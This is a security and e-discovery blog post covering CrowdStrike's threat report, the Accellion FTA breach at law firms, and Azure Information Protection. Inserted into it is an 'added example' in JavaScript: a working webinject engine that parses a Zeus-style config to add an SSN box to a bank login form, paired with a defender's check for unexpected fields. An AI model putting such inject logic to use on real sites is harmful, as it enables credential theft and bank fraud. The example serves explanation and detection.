
CrowdStrike is a leading American cybersecurity company that took the lead in the investigation of Russia's hacking of the Democratic National Committee's email back in 2016. As detailed in a recent ZDNet article, CrowdStrike has released its Global Threat Report for 2021, which illustrates how cyber criminals cooperate with one another and divide the work of an attack among specialist groups.


Some groups specialize in providing services such as ransomware and malware kits. Webinject kits add JavaScript or HTML into a victim's browser session to alter what a web page shows the user. For example, an additional box can be added to a bank's online form that prompts the user to enter confidential information, such as a Social Security number, which the legitimate site never asks for.
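To make the mechanism concrete, the following is an added example (not code from this post, from CrowdStrike's report, or from any kit) of how a webinject works and how a site can check for it. Many banking-trojan kits drive their injects from a text config in the block format popularized by the Zeus family (set_url, then data_before / data_inject / data_after blocks, each closed by data_end); the parser below is a simplified reading of that convention, and the bank URL, form field names and sample login page are all constructed for the demonstration.

```javascript
// Added example, not code from the blog post or from any vendor or threat
// report: a minimal webinject engine plus the check a site owner can run
// against it. The config format handled here is a simplified reading of the
// Zeus-style block convention (set_url / data_before / data_inject /
// data_after, each data block closed by data_end); the URL, field names and
// sample page are constructed for the demonstration.

// Turn a config "mask" (with * as wildcard) into a RegExp. Anchored masks are
// used for URLs; unanchored ones locate HTML anchors inside the page.
function globToRegExp(glob, anchored) {
  const body = glob
    .split("*")
    .map((s) => s.replace(/[.+?^${}()|[\]\\]/g, "\\$&")) // escape regex metacharacters
    .join(".*?");
  return new RegExp(anchored ? "^" + body + "$" : body, "s");
}

// Parse the config into rules: { mask, flags, before, inject, after }.
function parseWebinjectConfig(text) {
  const rules = [];
  let rule = null;
  let section = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (section) {
      if (line === "data_end") { section = null; continue; }
      rule[section] += (rule[section] ? "\n" : "") + line;
      continue;
    }
    if (line.startsWith("set_url ")) {
      const [, mask, flags = ""] = line.split(/\s+/);
      rule = { mask, flags, before: "", inject: "", after: "" };
      rules.push(rule);
    } else if (rule && /^data_(before|inject|after)$/.test(line)) {
      section = line.slice("data_".length);
    }
  }
  return rules;
}

// Apply every rule whose URL mask matches: find the data_before anchor, then
// splice data_inject in after it, replacing anything up to data_after (if any).
function applyWebinjects(rules, url, html) {
  let out = html;
  for (const rule of rules) {
    if (!globToRegExp(rule.mask, true).test(url)) continue;
    const before = globToRegExp(rule.before, false).exec(out);
    if (!before) continue; // anchor absent (e.g. the bank changed its markup): the inject silently fails
    const start = before.index + before[0].length;
    let end = start;
    if (rule.after) {
      const after = globToRegExp(rule.after, false).exec(out.slice(start));
      if (!after) continue;
      end = start + after.index;
    }
    out = out.slice(0, start) + rule.inject + out.slice(end);
  }
  return out;
}

// Defender's check: list form field names the page does not expect. A site can
// ship the expected list with its page and report anything extra that shows up
// in the rendered form, which is exactly what a webinject adds.
function unexpectedFields(html, expectedNames) {
  const re = /<input\b[^>]*\bname=["']([^"']+)["'][^>]*>/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found.filter((name) => !expectedNames.includes(name));
}

// Constructed sample config: on the login page, add an SSN box right after the
// password field.
const SAMPLE_CONFIG = `
set_url https://bank.example/login* GP
data_before
<input type="password"*>
data_end
data_inject
<label>SSN</label><input type="text" name="ssn" maxlength="11">
data_end
data_after
data_end
`;

// Constructed sample login page as the bank serves it.
const SAMPLE_PAGE = `<form action="/login" method="post">
<input type="text" name="user">
<input type="password" name="pass">
<button>Sign in</button>
</form>`;

const EXPECTED_FIELDS = ["user", "pass"];

// Run the inject against the sample page and then the defender's check on the result.
function demo() {
  const rules = parseWebinjectConfig(SAMPLE_CONFIG);
  const injected = applyWebinjects(rules, "https://bank.example/login?lang=en", SAMPLE_PAGE);
  return { injected, extra: unexpectedFields(injected, EXPECTED_FIELDS) };
}

if (typeof require !== "undefined" && require.main === module) {
  const { injected, extra } = demo();
  console.log(injected);
  console.log("unexpected fields:", extra); // [ 'ssn' ]
}
```

Two points worth noting from the run: the inject only fires when both the URL mask and the data_before anchor match, so a bank that changes its login markup breaks the kit until the operator updates the config, and the extra field is invisible to the server (it is added in the victim's browser), which is why the integrity check has to run client-side or compare what the browser rendered against what the server sent.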


Others focus on distribution, either by running spam campaigns or by operating traffic distribution systems (TDS). A TDS redirects visitors from one site to another, typically to a landing page from which malware is installed.


Money mules are people who may believe they are working as payment processing agents but are in fact laundering the proceeds of cyber attacks: funds sent by victims land in the mule's bank account and are forwarded to the criminals through a money-transfer service such as Western Union, where the transfer is difficult to trace or recover. Dump shops and CVV (card verification value) shops sell stolen payment card data at around $20 per account. 'Dumps' are magnetic-stripe track data that buyers can write onto counterfeit cards, while CVV shop data (card number, expiry date and security code) is used for card-not-present fraud.


The widely used secure file transfer service, Accellion File Transfer Appliance (FTA), was compromised by attackers this past December. Accellion posted a notice about the attack and issued an update for FTA that addresses the flaws the attackers used to gain access to data.


Two large law firms, Jones Day LLP and Goodwin LLP, have had data exposed through the Accellion breach. Data that Jones Day transferred to outside parties via Accellion was stolen and posted on the Cl0p ransomware group's leak site, but the law firm's own network was not compromised. In a report by Vice News, Cl0p claims to have taken up to 5 GB of data from Jones Day.




Accellion FTA is a legacy product that is now near its End of Life: support for FTA will be discontinued on April 30, 2021, as the notice posted by Accellion explains. Accellion has a different file transfer service, kiteworks, which has an entirely different code base; its source code is not shared with Accellion FTA, according to a second Accellion notice.


So, if you receive a file transfer link that indicates it was 'Secured by Accellion', you may want to confirm that the sender has migrated to Accellion kiteworks, or at least applied the FTA patches Accellion has issued since the December attack.


The Tip of the Night for April 28, 2018 discussed Azure Information Protection (AIP), which allows Microsoft 365 to classify and protect files meeting certain criteria. Opening a protected file requires authentication: only individually authorized users can access it. The way in which a file can be used (for example, whether it can be printed or forwarded) can also be restricted, and access to the file can be logged by the AIP system.


Azure Information Protection Viewer is a separate application needed to view these protected files.




You can spot these files by the 'p' added to the beginning of the file extension. For example, a protected text file will have the extension, '.ptxt'.


The AIP system cannot be used to protect .exe, .bat, .pst and other common system files. Email .msg files, rich text format .rtf files and compressed .rar files are not protected by default when the AIP scanner is used, and AIP's ability to scan .rtf files is limited even when scanning of that type is enabled.


AIP can scan zip files, but an administrator must first enable this with a PowerShell command. A protected zip file is renamed to 'name.zip.pfile'.


A different PowerShell command is used to OCR TIFF images so that they can be scanned for sensitive information that should be protected.




Sean O'Shea has more than 20 years of experience in the litigation support field with major law firms in New York and San Francisco.   He is an ACEDS Certified eDiscovery Specialist and a Relativity Certified Administrator.

The views expressed in this blog are those of the owner and do not reflect the views or opinions of the owner’s employer.


© 2015 by Sean O'Shea . Proudly created with Wix.com
